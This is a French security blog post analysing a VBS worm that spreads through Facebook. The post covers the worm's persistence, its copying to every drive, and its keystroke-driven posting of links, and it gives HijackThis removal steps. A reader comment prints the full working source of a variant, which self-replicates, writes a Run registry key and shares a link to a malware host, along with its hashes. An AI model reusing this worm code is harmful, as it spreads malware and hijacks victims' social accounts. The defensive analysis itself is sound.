Ver Facebook en VBS

J’avais fait un billet il y a quelques temps sur les Virus Facebook qui se propageait via de fausses vidéo pour installer des extensions sur les navigateurs WEB.

Aujourd’hui, j’ai été contacté en message privé sur commentcamarche.net, dont voici une capture :


Le zip contient un fichier Bulletin147.vbe, comme vous pouvez le voir, le contenu est offusqué :

Le script suivant permet de deoffusquer le VBS : http://www.interclasse.com/scripts/decovbe.php
Le script ouvre des popups pour proposer des donations sur des sites contre la faim, puis copi le script vers un fichier Knucker.A.vbe dans le dossier Windows et Wsserv.vbe dans le dossier Démarrage.

Une clef Run est ensuite créée afin de lancer le fichier Knucker.A.vbe au démarrage de l’ordinateur.

Le fichier est ensuite copié à la racine de charge disque sous le nom Je_t’aime.vbe mais aucun fichier autorun.inf n’est créé.

Le script va ensuite parcourir la liste des processus, si un des processus du navigateur WEB est présent – ce dernier va se connecter à Facebook :


puis envoye des instructions clavier :

L’auteur parie sur le fait que vous avez une connexion automatique sur Facebook pour envoyer les instructions clavier afin de poster un message avec en lien bien entendu le script VBS.
C’est assez bourrain.


Dans mon cas, ça ne marche pas très bien.
Le focus sur le formulaire n’est pas récupé, les lettres sont bien tapés mais la validation du formulaire ne fonctionne pas.

Le contact de commentcamarche (que je remercie) m’a fait une capture, ça semble fonctionner chez lui :

La détection du script : https://www.virustotal.com/file/32fea2660e48b0d0194f964db305a91a50841e8ee0ab09cbe684d24844bea13c/analysis/

SHA256: 32fea2660e48b0d0194f964db305a91a50841e8ee0ab09cbe684d24844bea13c
 File name: Bulletin147.vbe
 Detection ratio: 6 / 43
 Analysis date: 2012-03-17 15:49:05 UTC ( 50 minutes ago )
Antiy-AVL Trojan/win32.agent 20120317
 AVG JS/Heur 20120317
 Comodo UnclassifiedMalware 20120317
 Emsisoft Virus.JS.Heur!IK 20120317
 Ikarus Virus.JS.Heur 20120317
 Kaspersky Trojan.Script.Suspic.gen 20120317

Ci-dessous, les lignes malicieuses visibles sur HijackThis.
Ces lignes sont à cocher puis cliquer sur Fix Checked.
Redémarrez l’ordinateur, le ver ne devrait plus être actif.

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 63 times, 1 visits today)

7 thoughts on “Ver Facebook en VBS

  1. Salut.

    LOL J’aime bien ton pseudo FaceBook. Je trouve qu’il s’intègre bien dans l’environnement facebookien. Il m’inspire d’ailleurs, si un jour je devais m’inscrire sur FaceBook je choisirai certainement « CacaFougnon ». 😀

  2. C’est sur mon ordi depuis 3 jours et je cherchais désespérement comment m’en débarasser (apparemment ça a infecté tous les ordis de mon école) je teste ça tout de suite: merci !

  3. salut ; une variante à inclure dans les outils de désinfection(s) :

    On error resume next '11/07/2012 by N@ks
    Set C = CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName)
    Set Nn1 = CreateObject("WScript.Shell")
    Set Nn2 = CreateObject("Scripting.FileSystemObject")
    Set Nn3 = Nn2.GetSpecialFolder(1)
    Set Drives=Nn2.drives
    Bm = Nn1.SpecialFolders("Startup")
    Do
    For Each Drive in Drives
    If drive.isready then
    Nn2.CopyFile ""&WScript.ScriptFullName&"" , ""&drive&"\Je_t'aime.vbs"
    end If
    Next
    C.Copy(Nn3&"\Knucker.C.vbs")
    If Nn2.FileExists(Nn3&"\Knucker.C.vbs") Then
    Nn1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Pdll", ""&Nn3&"\Knucker.C.vbs"
    Else
    C.Copy(Bm&"\Wsserv.vbs")
    End If
    wscript.sleep 10000
    Nn1.run "http://www.facebook.com/sharer.php?u=http://kamasms.fr/vi.html"
    wscript.sleep 7000
    Nn1.SendKeys ("{tab}")
    Nn1.SendKeys ("{tab}")
    Nn1.SendKeys ("{tab}")
    Nn1.SendKeys ("Je t'aime mon amoooouuuurrr <3<3<3 :) !")
    wscript.sleep 121
    Nn1.SendKeys ("{tab}")
    Nn1.SendKeys ("{enter}")
    wscript.sleep 121
    Nn1.SendKeys ("^{F4}")
    wscript.sleep 1000*60*15
    Loop

    http://kamasms.fr/vi.html => http://kamasms.fr/Je_t%27aime.zip :

    (tempuser=>7-Zip)\Je_t’aime.zip

    651 octets (651 octets)
    651 octets (651 octets)

    CRC32: 7E383407
    MD5: 98A28BEA636D331FE1BD29C815A541E7
    SHA-1: A7CD080AF3659DD48556C05D0A9646A790C81D21
    SHA-256: 48CD9A43CF3B7F3CDDC5235EC53F10B608918DBA8717CBD5541CE75DFCCABE8C

    (tempuser=>7-Zip)\Je_t’aime.zip\Je_t’aime.vbs

    1,04 Ko (1 069 octets)
    1,04 Ko (1 069 octets)

    CRC32: 565EACC0
    MD5: F4F0BF9989464889EEF9A5C4B786E8FC
    SHA-1: 67A6A77E85088CBF2AA7D2DE9AC86FFB696F27BF
    SHA-256: 5548E4E1CC6DA289F881B749669FE7B2372B3AD296C803344780738E09A896B8

  4. re salut et merci 😉

    Par contre, pour pouvoir mieux dormir, j’aimerai savoir ce que contient le fichier que tu as dispatché (j’aurai bien vu moi-même mais il y a des mots de passe sur les têtes de morts), sachant que les hashs ne correspondent pas (« Je_t’aime.vbs » extrait du zip) ; merci.

    Note : les antislashs ne passent pas, pour les chemins de dossiers ; ici dans les commentaires ; re-merci + il manque la prévisualisation ; re-re-merci.

    Sur virustotal, il y a le zip … (preums by myself) ; par contre, il faut donner le lien réel (et pas « (…)vi.html ») car virustotal est incapable de suivre la redirection ; il n’y a pas moyen de pouvoir améliorer ce fonctionnement, afin, c’est à Google de le faire maintenant ? merci.

    merci, bye.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *